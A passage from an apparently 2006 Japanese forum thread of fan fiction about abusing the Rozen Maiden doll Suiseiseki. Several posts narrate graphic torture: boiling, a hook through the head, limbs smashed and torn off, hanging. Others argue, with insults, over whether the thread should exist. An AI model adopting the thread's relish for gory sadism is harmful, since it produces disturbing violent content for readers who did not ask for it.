ごめんな。ちょっと荒れたかな。

402 :名無しかわいいよ名無し:2006/02/24(金) 12:06:03 ID:SQwHJhzt
>>399てめーも荒らし全員にいってからこい。そのジャンルに萌えているいる自体がおかしいんだよ。精神いってんぞ
自分の脳内か、オリキャラでやれよ(虐待される側)。 作者が悲しむっつってんだろ。わかんねーのか。要するに植民地にされてる感じだ。
作者に許可とってからやれ

>>401宗教の違いだけで、過去のことだけで紛争、反対運動起こる時代だぜ
喧嘩もささいなことではじまるもんだろ?自分と相手の意見が合わないから起きるんだろ?
きれいごとばっか並べていい人ぶるな。おまえもこの猟奇変態どもの仲間か?
萌え狂って?お前も大概のくせに喋るな。人のこといえんし勝手に決めんな。おまえは独裁者か。
反対運動やってなにが悪い?
今は民主主義の時代。子供に悪影響及ぼして、日本荒れてもいいって感じの人か?


403 :名無しかわいいよ名無し:2006/02/24(金) 13:23:21 ID:jTE7qW7K
たしか、いったん接続きればIDはかわるものだったな

404 :名無しかわいいよ名無し:2006/02/24(金) 13:28:21 ID:qpBKRSpS
>>402
聞いてくれ俺はこのスレの虐待話は面白いって思ってるんだ。

そうなった原因は子供の頃よく親に
ヒロインが毒リンゴ食べさせられる「白雪姫」とか強制労働させられる「シンデレラ」とか
両足切断される「赤い靴の女の子」とか狼に食われる「赤ずきん」とか
薬飲んで言葉がしゃべれなくなって略奪愛を画策するも失敗し、果ては王子様を殺害未遂し最後は自殺する「人魚姫」
とか読み聞かされたからさ。

今思えば、不幸や苦痛に合わされるヒロインに「萌える」のはそういう幼少時の体験が影響してるのかもしれん。
日本の将来を憂う>>402
そこまで言うなら当然各出版社や書店に「白雪姫」や「シンデレラ」や「人魚姫」の不買運動や店頭からの撤去をする働きかけをしてくれるよな?

さらに版権持ってるアンデルセンの子孫に無断で「人魚姫」がハッピーエンドになるアニメ作ったり
手塚治虫の「ジャングル大帝」パクったデ〇ズニーにも抗議してくれるんだよな?
やってくれるよな?>>402?







405 :名無しかわいいよ名無し:2006/02/24(金) 13:40:02 ID:daKSrO+q
「虐待は可哀相だ脳内でやれ」
じゃあ薔薇乙女同人の主な内容である、H・凌辱系だって可哀相だと思わないの?
あれは性的虐待にあたるよね。(´ー`)
例え合意Hだってダッチワイフにされてピーチピットは悲しんでるかもね?
凌辱じゃなくてももしかしたら同人ネタにされる事自体ピーチピットは悲しんでるかもよ?
ありえないとはいえないよねぇ

大体ここは2chだよ。
電車男につられて来た最近来た初心者かな?
いっとくけど電車男の2chと本物の2chは全然違うよ
あと宗教と萌え趣向って全くもって関係無いよね
宗教戦争の話出してるけどこんな同人の事なんかに使うなんて実際戦ってる人を愚弄してるよ。
小学生が言ってるヘリクツとそっくりだよ。
まぁ何が言いたいかというと


初心者は(゚∀゚)カエレ!

406 :名無しかわいいよ名無し:2006/02/24(金) 14:09:02 ID:SXZVqDvM
相手にしないでスルーしようぜ。

407 :名無しかわいいよ名無し:2006/02/24(金) 14:27:42 ID:IK7zBhSO
本スレからリア厨が、あらしに来てるな。
VIRと、かわらん。

408 :名無しかわいいよ名無し:2006/02/24(金) 16:31:05 ID:SNTOUa+8
       (o;).  (o;)
  lゝlヽ  ||   ||  γlノl クワッ
  ゝ´;ノ, く/',二二ヽ> ゝ;ソ
    ゝ ~|  |ノノイハ } ノ
    /\l  |#゚听| l/ヽ すこや蟹!のびや蟹!
    /\l____|(l_介」_ノ/ヽ 
    ヽ ̄≦ノ`ヽノヘ≧~7
      ミく二二二〉ミ


409 :名無しかわいいよ名無し:2006/02/24(金) 17:17:33 ID:SNTOUa+8
「すこや蟹! のびや蟹!」
ジュルルルルルルル・・・・
蟹の格好をしてふざけている翠星石を獲物を見つめるような目で見ている人間がいた。
「おいしそうだなぁ・・・」
人間はポツリとそうつぶやき、翠星石に近づいた。
「!?」
それに気づいた翠星石は身構えた。
「ねぇ、君とってもおいしそうだね」
「なにこわいこと言ってるですか、翠星石は気高いローゼンメイデンですよ。だいたいお前は誰ですか? このデブ人間!」
そういうと翠星石は走り出したが・・・、
ズン ズリュ バタン ビリッ!
「痛いです! 何が起こったですか・・・? あぁ!」
顔面から翠星石はころんだ。見るとスカートが踏まれている。自慢のスカートもすこし裂けていた。
「翠星石のスカートがぁ・・・」
「誰でもあるし、誰でもない。それはともかくおいしそうだねぇ、翠星石ちゃん♪」
人間はそう言うと翠星石の髪の毛を掴み、もちあげた。翠星石の顔が苦痛で歪む。
「何わけわかんないこと言ってるですか! とっとと離しやがれです! このデブ人間!」
そういうと翠星石はジタバタと見苦しく動きはじめた。自由になる手と足で人間の体を精一杯叩く、蹴る。
パシ パシ パシ コン
しかし翠星石が動くたびに、人間が髪を持ち揺らしているため、人間は少しも痛みを感じなかった。
「痛いですっ! いい加減、離しやがれですぅ!」
「おぉ! 活きがいいね!」
人間はそういうと面白がってわざと髪を揺らした。
プチン プチン プチン プチン
そのせいか翠星石自慢の髪の毛が何本か抜け落ちた。
「うぅ、ひどいです! 痛いです! いますぐやめろです! いっぺん死んでみやがれですぅ!」
「ハハハ、それは勘弁だな。それはそうと口の聴き方には気をつけなよ」
そういうと人間はなおも揺らし続けた。翠星石は今にも泣き出しそうであった。きれいなオッドアイは涙で輝いていた。
ガチャ キュイー パタン
翠星石を持った人間は倉庫へと入った。
                       つづく

410 :トニーさんとデュードさん:2006/02/24(金) 17:29:05 ID:xhSqjFqe
翠星石の体はあれやこれやでどうにか直ったが、トニーの虐待はこれで終わりではなかった。
むしろ始まりだったのだ。
蒼星石を目の前で殺されてから数日後、翠星石は抜け殻のように静かだった。
「ッチ、これじゃ苛めようがないな」
相手の恐怖心をそそることで快楽を得ているトニーにとってこれは痛手だった。
どれだけ蹴ったり殴ったりしても無反応なのだ。
「こうなりゃ奥の手だ」
トニーは携帯電話を持ち、翠星石を監禁している部屋に向かった。
「お、俺だ。トニーだよ。久しぶりだな。ちょっと頼みたいことがあってな」
誰と話しているのだろう。翠星石は少し気になった。
「おう、そういうわけでよろしく頼むぜデュ・ー・ド・さ・んよ!」
『デュード』
その名を聞いただけで翠星石はもういても立ってもいられなくなった。
「きゃああああ!ここを出せです!あいつとは会いたくないですぅ!」
「うっせえよ!ゴタゴタ騒ぐんじゃねえ!」
腹を思いっきり蹴り飛ばす。
「っぐえ!これが騒げねえでいられますか!あんなクズ野郎には会いたくないですぅ!」
「へえ、じゃあジュン君に会えなくてもいいのか?それに俺はあいつを呼ぶともお前をめちゃくちゃにさせるとも言ってないぜ?」
「じゅ、ジュンが生きてるですか?」
「さあな。そいつはデュードに聞いてみな。いずれにせよ今回の件が終われば会えるかもしれないぜ」
ニヤリと笑うトニー。相変わらずとんでもないことを考えていそうな顔である。
「ほ、本当ですか?うう、我慢するですぅ」
「へへ、いい子だ」
そう言ってトニーは翠星石の頬をぺろりと舐めた。
「う・・・」
「まあそれまで待ってな。今日はこれを食わせやるよ。ほら」
トニーは珍しく普通のカツレツと普通のスープを置いて部屋から出て行った。
「果たして耐えられるかな・・・翠星石・・・へへへへ」

411 :名無しかわいいよ名無し:2006/02/24(金) 17:51:06 ID:SNTOUa+8
倉庫の中には巨大な鍋が用意されていた。中にはグツグツと湯がその中に食材が放り込まれるのをいまかいまかと待っていた。
「今日はカニ鍋だぁ♪」
満面の笑みで人間は言った。
「まさかこの中に・・・」
翠星石は青ざめた顔で言いかけた。すぐさま首を振る。
「ま、まさか、そんなわけないですぅ! 人間が人形を食べるなんて、いくらデブ人間でも・・・」
「そのまさかなんだよ」
人間は翠星石を持ち上げ眼を見つめながら言った。
ツゥーーーー
翠星石の右頬に涙が一筋つたった。
「やめろですぅ! 翠星石なんかくったってうまくねぇですよ!」
「それはやってみなくちゃわからんだろw」
そういうと人間は天井からつるされているフックを手繰り寄せ、翠星石の顔に近づけていった。
「ヒィィィィィィィ、そんなもの近づけるなです! あぶないです!」
キリキリ
「ウゥゥゥゥゥ、痛いです! 痛いです! 痛いです!」
翠星石の額にフックが押し付けられている。すると、
パコン!
見事にフックが翠星石の額にねじ込まれた。
「ヒギャァァァァァァァァァァァァァァァァァァ! 翠星石はゼッタイ、ゼッタイ、ゼーーーーーーーータイッ、お前を許さないです!」
「あっそ。本当に威勢がいいなw」
人間は手を離した。
チャラン チャラン
宙吊りになった翠星石をあわれむかのように鎖がなった。
「ヒグッ、ヒグッ」
翠星石の顔は涙でグチャグチャになっていた。
「いいかっこだな」
人間はそう言うと手元にあるスイッチを押した。
ウィィィィィィィン ガチャ ウィィィィィィィィィン
フックが鍋へと近づいていく。
                    つづく

412 :名無しかわいいよ名無し:2006/02/24(金) 18:21:19 ID:SNTOUa+8
フックは鍋の真上に到着した。翠星石はグツグツと煮え立っている鍋を見た。湯気が顔に当たった。
「ヒィィィィィ、嫌です! 嫌です! こんなの嫌です! 気に障ったのなら謝るです! だから今すぐこんなことやめてです!」
けっして普段言わないようなことを翠星石は叫んだ。しかし地上の人間は・・・
「いまさら遅いんだよ。うらむのなら自らのその口の悪さをうらむんだな」
無情にも手元のスイッチを押した。
チャリ チャリ チャリ チャリ チャリ チャリ
フックは鍋の中へ近づいていく。
「嫌ですぅぅぅぅぅぅぅぅ!」
パシャ パシャ パシャ パシャ パシャ パシャ
とうとう足が湯の中へ入ってしまった。翠星石はどうにかして逃げようともがいた。しかし・・・、
「熱いです! 痛いです! 熱いです! 痛いです! 熱いです! 痛いですぅぅぅぅぅぅぅ!」
湯の熱さと、逃げようともがくたびにくいこむ額のフックの痛みに翠星石は苦悶の表情をうかべ、絶叫している。
翠星石の体が腰まで湯につかったところで人間はフックの動きをとめた。
「どうしてこんなことを・・・」
「翠星石がおいしそうだからだよ」
翠星石はキッと人間をにらんだ。
「ふざけるんじゃないです!」
そう叫ぶと翠星石は動きをとめた。
「気絶したのか・・・?」
                  つづく

413 :名無しかわいいよ名無し:2006/02/24(金) 18:24:51 ID:SNTOUa+8
>>388
こんなのでどうですか
続きは後日
今忙しいので

>>393
ありがたくつかわせてもらおうかと
待っててね

414 :名無しかわいいよ名無し:2006/02/24(金) 18:37:07 ID:x+mkRq2C
>>410
おいおい、デュードとトニー夢の競演かw

415 :名無しかわいいよ名無し:2006/02/24(金) 19:07:20 ID:EGD9A65E
同時刻に2つの作品が来るとは。
どちらも楽しんだよ、GJ

416 :トニーさんとデュードさん:2006/02/24(金) 19:27:41 ID:xhSqjFqe
デュードが来る。そう思っていた翠星石。
だが1週間、2週間と経っても一向に来る気配は無い。
それどころか、ここのところトニーの虐待は全く無く、食事もまともなものを与えられ、日に日に本調子に戻っていった。
そしてトニーのことも少なからずまともな人間ではないのだろうかと思うようになってきた。
しかも最近は出かけることが多く、翠星石を鎖で繋いでおくこともなくなった。
今日も出かけてもう夜になるが帰ってこない。
・・・次の日
「おかしいですぅ。まだ帰ってこないなんて」
多少心配になる翠星石。
「べ、別にあいつのことなんてどうでもいいですのに!というかむしろ嫌い・・・」
と、ドア越しになにやら人の声が聞こえてきた。
『おうデュード、ブツの用意だけはしっかりできてるな』
『当たり前だぜ。サイズ(大鎌)、スレッジ(大金槌)まで用意してきたぜ。このままあいつに俺の顔見せたらビビっちまうだろうからここで退散するぜ。また後でな』
『あのクソ人形に一泡吹かせてやるぜ!ひっひっひ』
と、会話が終わった頃合を見計らって監禁室に走り出す翠星石。
「やっぱりあいつがいやがるですぅ!」
デュードの顔を想像しただけでガタガタと震える翠星石。
そしてドアがバタンと開く。そこには大鎌を携えたトニーの姿があった。
「へへへ、これからが本番だぜ翠星石!死神のパーティだ!」
「ひどいですぅ!おまえはまともな人間に更生したと思っていたのに!っきゃ!」
トニーの蹴りで吹っ飛ぶ翠星石。
「人形ごときが俺のことを『おまえ』呼ばわりするんじゃねえ!ぶった切るぞ!」
倒れこんだ翠星石に近寄り、首筋に鎌を突きつけた。
「いいか、俺はお前に情けをかけた憶えはねえ!ただ日常の生活を取り戻させて、また恐怖を味わえる体にしてやっただけさ。感謝するんだな!」

すいません後の構想忘れたんで続きお願いします

417 :名無しかわいいよ名無し:2006/02/24(金) 21:18:01 ID:YWn9w82I
GJ!!

きついのも良いけど、>>219見たいのも良いね。

418 :名無しかわいいよ名無し:2006/02/24(金) 22:04:25 ID:jTE7qW7K
>>413
期待してます
>>417
スレが荒らされたからしばらくはつらいのが続くかと…皺寄せが翠星石にきてしまうかと…

二つとも面白かったです

419 :名無しかわいいよ名無し:2006/02/25(土) 01:17:42 ID:WCfaL1fp
何この犯罪者予備軍の集うスレは?
きもちわりい…

420 :名無しかわいいよ名無し:2006/02/25(土) 02:06:55 ID:QjtPzMdX
>>404    両者者のスレを読んだがお前の話は分かった。
けど、お前の親の話と子供向けの出版物の内容は違うに決まってんだ。人の不幸を喜ぶのはおかしい。
とにかく全出版物の内容も知らずに書くな。全部ほのぼのだろが。ここはひでえバッドエンドしかねーじゃん
それに、猟奇についていってんのになんで著作侵害の話にかえるんだ?90度くらい話変わったよな。
荒らされたピーチ・ピットの気持ちが分かるだろ。トニーさんだっけ?きつ過ぎだと思います。>>219ぐらいならまだ分かりますが、
これはローゼンファンやピーチピットへの精神的攻撃とも見えます。

>405
全部説明しないとわからないのか。やっぱり低脳だな。しかも度合いが明らかに違うし(↑参照)
それにたとえ話が貼ってあるだけだろ。接点なんてほとんどないんじゃないの?勝手に接点濃くして愚弄してるのはお前に見えるけどな
しかも途中まで<?>で聞いてきたくせに後は決め付けかよ。文章の矛盾だな。日本語をしっかり学んでこなかった低脳だな。
ヘリクツこいたことないのかお前?言い訳スンナとか見たいな感じだけど、それじゃあ世界は決め付けで決まっちゃうね。誰も弁解できないので
電車男なんか作り話だろ?ここにもってくんな

やっぱり視野が狭くて社会の端っこでこそこそしてるような超のつく<変態>の集まりなんだね

荒らしの方々へ
いいたいことは分かる。
確かにそんな感じもするな。ひどいもんなコイツラ。

このスレの方々へ
もっとソフトに行けば荒らしはないと思う。>>219のように。
「これじゃあんまりだ」って感じ。
誰か一人翠星石になってこんなことされても嬉しくないだろうし。
自分だって精神的にきてしまうようなことはされたくないはず。
「これならまだ」と普通の人にも分かってもらえるようなものに改善すべし。


421 :名無しかわいいよ名無し:2006/02/25(土) 02:08:24 ID:QjtPzMdX
>>404    両者者のスレを読んだがお前の話は分かった。
けど、お前の親の話と子供向けの出版物の内容は違うに決まってんだ。人の不幸を喜ぶのはおかしい。
とにかく全出版物の内容も知らずに書くな。全部ほのぼのだろが。ここはひでえバッドエンドしかねーじゃん
それに、猟奇についていってんのになんで著作侵害の話にかえるんだ?90度くらい話変わったよな。
荒らされたピーチ・ピットの気持ちが分かるだろ。トニーさんだっけ?きつ過ぎだと思います。>>219ぐらいならまだ分かりますが、
これはローゼンファンやピーチピットへの精神的攻撃とも見えます。

>405
全部説明しないとわからないのか。やっぱり低脳だな。しかも度合いが明らかに違うし(↑参照)
それにたとえ話が貼ってあるだけだろ。接点なんてほとんどないんじゃないの?勝手に接点濃くして愚弄してるのはお前に見えるけどな
しかも途中まで<?>で聞いてきたくせに後は決め付けかよ。文章の矛盾だな。日本語をしっかり学んでこなかった低脳だな。
ヘリクツこいたことないのかお前?言い訳スンナとか見たいな感じだけど、それじゃあ世界は決め付けで決まっちゃうね。誰も弁解できないので
電車男なんか作り話だろ?ここにもってくんな

やっぱり視野が狭くて社会の端っこでこそこそしてるような超のつく<変態>の集まりなんだね

荒らしの方々へ
いいたいことは分かる。
確かにそんな感じもするな。ひどいもんなコイツラ。

このスレの方々へ
もっとソフトに行けば荒らしはないと思う。>>219のように。
「これじゃあんまりだ」って感じ。
誰か一人翠星石になってこんなことされても嬉しくないだろうし。
自分だって精神的にきてしまうようなことはされたくないはず。
「これならまだ」と普通の人にも分かってもらえるようなものに改善すべし。


422 :名無しかわいいよ名無し:2006/02/25(土) 02:09:07 ID:WonunjnF
「翠星石だけオヤツ抜き」ってくらいなら犯罪じゃないと思う。

423 :名無しかわいいよ名無し:2006/02/25(土) 02:17:37 ID:QjtPzMdX
それはオッケー

424 :名無しかわいいよ名無し:2006/02/25(土) 02:26:29 ID:7HhmFkyz
>>219
>>244

ぐらいに戻しますか・・・

425 :名無しかわいいよ名無し:2006/02/25(土) 02:46:52 ID:QjtPzMdX
>>244は好意をもてあそんでるので人によっては荒しの要因になるかも
読んみてジュンへの翠の好意を考えるとかなり苦しい


426 :トニーさんとデュードさん:2006/02/25(土) 02:47:39 ID:FIUtvEwG
何か変な方向に向かってるみたいだが、アホは相手にしないように。
それよりトニーの続きが見たい。

427 :名無しかわいいよ名無し:2006/02/25(土) 02:49:05 ID:2he62R5D
書こうと思ったけど変なのが沸いてるからしばらく見送る

428 :名無しかわいいよ名無し:2006/02/25(土) 02:50:00 ID:hY7rKb9Z
つまんない
精神的な屈辱だけでは

429 :名無しかわいいよ名無し:2006/02/25(土) 02:50:01 ID:QjtPzMdX
アホはそっちに見えてくるのですが

430 :名無しかわいいよ名無し:2006/02/25(土) 02:54:07 ID:QjtPzMdX
絶対に翠じゃないと出来ないんか?
オリキャラではできないのか


431 :名無しかわいいよ名無し:2006/02/25(土) 03:50:21 ID:MNcWJb1g
嫌ならカキコしなければいいのに、なんでキモいとか書くんですかね
注目されたいんですかね
かき回したいだけなんですかね

432 :名無しかわいいよ名無し:2006/02/25(土) 04:57:19 ID:QjtPzMdX
答えになってない

433 :名無しかわいいよ名無し:2006/02/25(土) 05:58:24 ID:WonunjnF
>>263
くらいなら良いの?
翠は心身共に傷ついてないし。
ジュンに吊される↓
雛にオモチャにされる

真紅にヤキモチやかれる(原作翠の台詞のパクリ)

のりにオヤツ、晩飯抜きにされる。

434 :名無しかわいいよ名無し:2006/02/25(土) 06:11:00 ID:QjtPzMdX
>>433
それくらいがいい
他の(特にトニー)は、気分悪くなって寝込むやつ出たそうだから

435 :名無しかわいいよ名無し:2006/02/25(土) 07:23:30 ID:TfYj7lfL
荒らしはスルーが鉄則

436 :名無しかわいいよ名無し:2006/02/25(土) 10:34:54 ID:UUWhTdg7
sageもレスアンカーも2chのスレの存在感意義も日本語の受け答えの仕方もわからん、
匿名掲示板なのに自分の要求は全て受け入れられると思い込んでて
自分に賛同しない奴は基地外だと思い込んでる正義厨の皮被ったある意味真性DQNなんぞヌルーヌルー

まぁでもいくら愛はあってもキャラ板に虐待スレたてるのは芳しくないなとは思うかな…
もし次スレがたつなら難民板とかに建てるべきかも

ま、とりあえず何事も無かった様に虐待ドゾー

437 :名無しかわいいよ名無し:2006/02/25(土) 10:35:52 ID:UUWhTdg7
存在感意義ってなんだ自分('A`)
存在意義だよ

438 :ドラマCDネタで:2006/02/25(土) 14:49:23 ID:7eosKKa3
勝手に
>>263-265のつづき

「うぅぅ...翠星石のカニクリームコロッケがぁ...みんなひどいですぅ翠星石のぶんのカニクリームコロッケをたべちゃうなんてですぅ〜...
 あうう...頭に血がのぼって眩暈が...ですぅ」

今はもう深夜といってもいいくらいの時間帯だった。翠星石は夕飯のときからジュンの部屋に吊るされたままだった。
逆さ吊りの状態のまま、かれこれ数時間このままで、いい加減手足もしびれてきたし頭がくらくらしていた。
「それにしてもみんな薄情ですぅ!翠星石を助けないで9時になったら、とっとと寝ちまうなんてですぅ」
いつもの就寝時間の9時になれば解放されるだろうとタカをくくっていた翠星石だったが、
いざ9時になったら、みんなさっさと鞄で寝てしまったのだ。特に真紅なんて吊るされっぱなしの翠星石を冷ややかな目で見て
知らんぷりして寝てしまったのだ。
「うぅぅ、あの子はいつも、ああです。ちょっとばかりこの家に早く来たからってエラそうにしやがってです!
 近いうちにヤキを入れてやるです!鞄の中にマタタビ生やして猫をおびきだして猫攻めにしてやるです!きひひひっ」

              バサバサッ
「?何の音ですぅ?」
窓辺のあたりで何か音がした。翠星石は逆さ吊りのまま器用に首をかしげて様子をうかがった。

ガチャ、カラカラ...
「誰か窓を開けてるです、まったく戸締りがなってねーですぅ!何か部屋に入ってくるですよ?」



439 :名無しかわいいよ名無し:2006/02/25(土) 15:29:04 ID:LFGIoMBI
このスレの住人へ
とりあえず旧シャア板にある「プルを虐待するスレ」を参考にすれば?
あそこならただプル達の日常生活を虐待っぽく書かれてるだけだから全く問題ないと思うぞ。
分からないならぐぐってみるべし。

440 :名無しかわいいよ名無し:2006/02/25(土) 15:31:59 ID:7eosKKa3
「ドロボウですか?来るなら来て見やがれです、この翠星石にかかれば悪党の一匹や二匹ケチョンケチョンにして...
 って、あああああ?!縛られて動けないです、ピンチですぅ。もし悪党が身動きできない可憐な翠星石に気づいたら...
 想像しただけでも恐ろしいです、ここはジッとして気づかれないように様子を見るです」

カラカラ...バサッ
翠星石が見守るなか窓が静かに開きそこに何か黒い影が現れた。そして影はスゥーっと宙に浮いたまま部屋の中央、翠星石が吊るされてる辺りまで移動してきた。
「ひぐっ!あわあわわわわっ、怪奇現象ですぅ!こっちに近づいてきやがったです!来るなです!」

「?!  その声は翠星石?!ちっ、ハメたわねぇ、あのガキぃ...」

「そそそそその声は水銀燈のコンチキショウだなですぅ!ななな何でオマエがここに?!
 くぅ〜ここであったが百年目です!この翠星石がオマエの命(たま)を殺(と)ってやるですぅ!」
「あらあら、おばかさぁん。そんな状態でこの水銀燈に勝てるとでも思ってるの?!」

両者にらみ合いの最中。
ガチャ
部屋のドアが開く。入ってきたのはこの部屋の主だった。
「ジュン!」
「ガキぃ...よくもこの水銀燈をハメてくれたわねぇ...おびきだして一網打尽ってワケぇ?ナメたことしてくれるわねぇ...」
「は...?ああ、この性悪人形か、すっかり忘れてた。約束は破ってない。準備はできている。こいつのことは放っておけばいい。
 居間のほうに準備はできている」
「そ、そぉ?」
「ちょ、ちょちょっと待つです!どういうことですか!?何でジュンと水銀燈が?!です」
「お前には関係ないだろ」
「か、関係あるです!チビはこの翠星石のマスターです!知る権利があるですよ!」
「うるせぇぞ...真紅たちが起きちゃうだろ」
「話すです!さもないと大声を出して真紅たちを叩き起こしてやるですよ?」
「ち、お前にかかわってるヒマなんて僕にはないんだ」
そういうとジュンはおもむろに履いていた靴下を脱ぎそれを丸めた。
「な、何をするですか?」
「うるさい静かにしてろ、これでも食らいやがれ」
ジュンは丸めた脱ぎたての靴下を翠星石の口につめこんだ。ツンとした、すっぱいような、しょっぱいような悪臭が翠星石の鼻腔を満たす。
「はわわわわわわふぁっ!...げぼ...く、くはいれすぅ!とってれすぅ!」
「朝まで静かにしてろよ。水銀燈、居間は下の階だ」
「まままま、待つれすぅ、な何をするつもりれすか?」
「ウフフフフ...これから私たち二人っきりでお楽しみなのぉ、お子様はさっさとネンネなさぁい♪」
「ちょ、げぼっ、おええっ、靴下、くちゃいれすぅ...ま、まさかお楽しみって、ナニをおっぱじめる気ですかぁ?!」
「あらぁ野暮なこと言わないの、お・ば・か・さ・ぁ・ん」
部屋を出て行く二人
「そ、そんな...ジュンが...裏切って水銀燈と手を組むなんて...
 うううチビ人間のロクデナシれすぅ〜」



441 :名無しかわいいよ名無し:2006/02/25(土) 16:03:12 ID:7eosKKa3
じゅんの靴下を口にしてモゴモゴしたまま、つぶやく翠星石
「ううう...ジュン...何で翠星石たちを裏切ったれすかぁ?ひどいれすぅ〜...
 翠星石は翠星石はジュンのこと...」
唾液で靴下が湿ってくる。
「ジュルッ、ぐげぇおえぇぇっほっ!!唾液が臭すっぱ、しょっぱいですぅ!ゴクッおえぇっ飲んじまったれふぅ!
 あ...ジュンの汗の匂いが...って、何やってるです?!翠星石は変態じゃないです!」
そうしてる間にも階下では何かゴソゴソしてる音が聞こえてくる。
「あ、あの二人いったい何をしてるですか?...べ、別に翠星石はチビがどうなろうと知ったこっちゃねぇですが、水銀燈が何を企んでるかがきになるだけですぅ」
翠星石は息をひそめて階下の様子に耳をすました。

「...ああ〜〜〜〜ん... ン君〜素敵ぃ〜〜♪」
「これ何かどう?」
「ああ〜〜〜...ン君〜〜〜うふふふ〜〜〜〜ん、あ〜ん♪」
「こんどはこれだ」
「や〜〜〜ん、もぉどぉにかなっちゃう〜〜〜♪」

ガーン...ガーン...ガーン...
「なんてこったです...いつの間にこんな関係になっていたですか...
 ジュンは...す、翠星石には、あ、あんなことしてくれないのです...」


その頃居間では
『じゃあ来週もよろしくんくん!』
「ああ〜〜ん、くんくん〜素敵ぃ〜〜〜〜〜次!次のDVDをさっさとセットしなさぁい」
「ああ...わかった、それより約束は」
「わかってるわぁ、DVDを見せてもらう代わりにここしばらくは戦いをしないでいてあげるわぁ...
 あっくんくん!しっかり〜そこよぉ!くんくんは負けないわぁ!!」

「真紅そっくり...やっぱ姉妹だな」





442 :名無しかわいいよ名無し:2006/02/25(土) 16:36:56 ID:7eosKKa3
ここでEND

ソフト路線にしてみた。



443 :名無しかわいいよ名無し:2006/02/25(土) 17:05:58 ID:c1IJyANC
良い〜w


444 :名無しかわいいよ名無し:2006/02/25(土) 20:08:05 ID:ZDb1O73f
面白いなァ

445 :名無しかわいいよ名無し:2006/02/25(土) 20:31:42 ID:Upq57OGX
           '´r==ミ、
       ,_ _ _   卯,iリノ)))〉 _ _ _
     /   `."-|l〉l.#゚ ー〔::二二〔()           ...:;:''"´"'''::;:,,, ドガァーーン!!
    '"'⌒`~"'" ''|/'i)卯iつ〔三三三:〔[二[二二二[〔()〕″     ,,;;;;´."'''
         と⌒__⊂ソ |ミ|| |_|_|  /A        '''''::;;;;::'''"´
                         
 ――――――――――――――――――――――

                                   ;: ;∵;::;ズガッ!!!!!
                                 ・,' (`Д´)。);:,.
                              ...∵~';∴∵;:;死にたくないですぅ〜!
                            '.:; *,,,,(: ;・∵:;゚
            

446 :名無しかわいいよ名無し:2006/02/25(土) 20:32:33 ID:Upq57OGX
翠星石なんてちょろいわよぉ〜

447 :名無しかわいいよ名無し:2006/02/25(土) 21:06:33 ID:0QM5tc81
>>439
なに指図してんだよ

448 :439:2006/02/25(土) 21:32:02 ID:LFGIoMBI
>>447
いや指図じゃなくて提案だから

449 :名無しかわいいよ名無し:2006/02/25(土) 21:39:04 ID:xwERntas
何回も言いたくないがそんなことはどうでもいいんだよ。職人以外は黙って作品投下待ってりゃいいだけ。

450 :名無しかわいいよ名無し:2006/02/25(土) 23:50:17 ID:QjtPzMdX
マターリいいね!

451 :名無しかわいいよ名無し:2006/02/25(土) 23:56:19 ID:Jorj7/aP
夜通しの残業から部屋に帰宅すると、灯りをともす前の暗闇の中で
ムシャラムシャラと怪しげな音。誰か居る。女?いまどき珍しい円形のスカートを
だだっぴろげて部屋の真ん中で堂々と買い置きのスナック菓子やpokkyを貪ってやがる
その物体はどこか見覚えがある。ミドリのベルベットのこやつ、
あの「ですぅ星人」だった。ヌシがカエッテキタデスぅなどと
あたふたする翠★石のうしろ髪をしっかりと?み、この泥棒猫めと
両手で左右のおさげ髪をひっぱりながら、灯りをともして奴の睨みつけるような
生意気な表情を、髭面を近づけつつまじまじと眺める。紛れも無くミドリである。
pokky喰ったくらいで泥棒呼ばわり心外ですぅなどとぬかしやがる。
そしてツェッペリンの音楽なんぞゴミのよう、次々と溺愛するバンドに対して
罵詈雑言をぬかしやがった。ビートルズとA乃T子を貶す言動が
このいけすかない悪魔人形に、心の底から、陰惨な殺意を抱かせるスイッチとなった。
2本の後ろ髪を右手に持ち替え、翠★石を遠心力にまかせてクルクルとふりまわし、
ホーロー台に叩きつけてやった。何するですか、イタイですぅ、
手前の為した図々しくも侮蔑にあふれた言動の罪深さなど微塵も自覚の無い
このミドリのドレスを被ったゴミは、キッと睨みつけながら
なんでこんなことするですぅとでも言いたげだ。そのまま髪を引っ張りつつ
頸を猫?みに押さえ込んで、頭からに熱湯をかけてやった。
漸く、ミドリの奴、本気で自分を虐待する気だ、と気づいたようだ。
そのまま、更に両の眼球のグラスアイに熱湯をたっぷりと注いでやり、
奴の反抗心を萎えさせてやった。硝子でできたオッドアイの眼球は無残にも
熱で罅だらけになる。虐待祭りはこれからだ。


452 :名無しかわいいよ名無し:2006/02/25(土) 23:59:18 ID:Jorj7/aP
本気で殺意を悟り始めた翠★石は部屋中を暴れまわるように逃げ始めた。
嫌がる翠★石を床に突き伏せさせ、左の上腕のパーツをハンマーで砕いてやった。
フリルブラウスに包まれた華奢な右手首を?みひねりまわして関節を破壊し、
そのまま右腕を肩関節から引きちぎる。両腕を破壊されてジャソクにされた状況を
信じられない表情で目を見開いて呆然とする翠★石。二度と再生しないように
ちぎられ分離した両腕のパーツを、翠★石の眼前でハンマーで粉々に砕いて燃やす。
陶器製のビスクパーツは既に原型をとどめていない。が、その破片の中に埋もれた
不気味な「モノ」がふと目に留まる。ゴム状の靭帯で繋がれた、それは明らかに
人骨だった。こいつら、人間の骨のフレームで出来ていやがる。
人骨には怪しげなキリル文字でまじないの語句が刻まれていた。
呪いの人骨で組み立てられた不浄のヒトガタを滅せよと、脳裏に擬神の指令が下る。




453 :名無しかわいいよ名無し:2006/02/26(日) 00:00:01 ID:Jorj7/aP
更に残酷な贖罪が翠★石に降りかかる。喉が焼け付くような声で泣き叫び、
半狂乱に暴れる翠★石のスカートとアンダーパニエをめくり、滅多にみせることの無い
両足首をさらけださせ、ファイバーロープで縛りあげる。
足首に繋がる縄尻を左右へ引っ張りあげると、翠★石の股関節はいとも簡単に破壊され、
両足がちぎれてジャソクになった。とうとうダルマになった翠★石。
あいかわらずですぅですぅ、翠★石はジャンクになってしまったでsぅとわめきちらす。

煩いので喉を締め上げる。そうだ、せっかくだからこのジャンクドールもインテリアとして
再利用しよう。サテンのリボンで頸をキュッと締め上げ、しっかりと縛り首にしたのち
リボンの縄尻を天井から吊るして、首吊りドールにしてみた。喋らなくなると
結構可愛げあるじゃないか、こうして四肢を破壊されてジャソクにされた翠★石は
物言わぬ首吊りダルマになったとさ。



454 :名無しかわいいよ名無し:2006/02/26(日) 00:06:44 ID:EApKvgSX
>>451
主人公すっゲー短気だな
まあそうでもないと始まらないか
個人的にはソフト系注文

455 :名無しかわいいよ名無し:2006/02/26(日) 00:12:13 ID:U6mVx9wY
